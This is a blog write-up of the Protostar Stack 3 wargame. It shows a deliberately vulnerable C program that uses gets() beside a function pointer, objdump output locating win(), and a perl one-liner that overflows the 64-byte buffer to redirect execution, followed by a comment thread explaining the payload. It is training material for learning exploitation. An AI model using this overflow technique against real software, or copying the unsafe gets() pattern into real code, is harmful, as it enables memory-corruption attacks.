Exploit Exercises - Protostar Stack 3

Unknown 5:52 AM exploit-exercises, hacking, linux, Protostar, wargames

This challenge starts getting a little bit more involved than the previous ones. Instead of just providing a new value for the "modified" variable, we need to make the code jump to a method, changing the execution.

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

void win()
{
 printf("code flow successfully changed\n");
}

int main(int argc, char **argv)
{
 volatile int (*fp)();
 char buffer[64];

 fp = 0;

 gets(buffer);

 if(fp) {
  printf("calling function pointer, jumping to 0x%08x\n", fp);
  fp();
 }
}

This means that first of all, we need to find the address of where the "win()" function is located in the program. To do this, I used objdump, however you could use gdb as well, or any other disassembly program. I have cut the useful part of the output below, since it gives a lot of information we don't need.

user@protostar:/opt/protostar/bin$ objdump -d stack3
...

08048424 :
8048424:       55                      push   %ebp
8048425:       89 e5                   mov    %esp,%ebp
8048427:       83 ec 18                sub    $0x18,%esp
804842a:       c7 04 24 40 85 04 08    movl   $0x8048540,(%esp)
8048431:       e8 2a ff ff ff          call   8048360 
8048436:       c9                      leave
8048437:       c3                      ret
...

From this, we can now see that the "win()" function is located at 0x08048424 in the memory. So if we can get our program to jump there, it will execute that code. Luckily the "fp" pointer in the code gets called if it is not equal to 0. We just need to overwrite it with the memory value of "win()" by doing the following:

user@protostar:/opt/protostar/bin$ perl -e 'print "A"x64 . "\x24\x84\x04\x08"' | ./stack3
calling function pointer, jumping to 0x08048424
code flow successfully changed

Labels: exploit-exercises hacking linux Protostar wargames

Author: Unknown
Waythemes is a blogger resources site is a provider of high quality blogger template with premium looking layout and robust design

3 comments:

numbersensesApril 22, 2012 at 5:23 PM
Hi, I'm currently learning about exploits, and I was wondering what the perl function you called does.

I looked at its usage, and I can't really piece together how your line:
perl -e 'print "A"x64 . "\x24\x84\x04\x08"' | ./stack3
works. Could you explain it a bit more or point me to a resource that explains it with some examples?
ReplyDelete
Replies
UnknownApril 22, 2012 at 5:28 PM
@numbersenses:
Sure, it's really pretty simple.

perl is being called, and the "-e" means to run a one-line program, everything in the single quotes.

The first part, is: print "A"x64
This simply prints the "A" character 64 times.

It then uses a period (".") to concatenate the 64 "A"s, with "\x24\x84\x04\x08". That string is 4 ASCII codes in hex format.

Lastly, the |./stack3:
This simply pipes the 64 "A"s, and the hex characters into the stack3 executable. Instead of having to type the characters manually, this types it into the standard input buffer.

Does that help?
ReplyDelete
Replies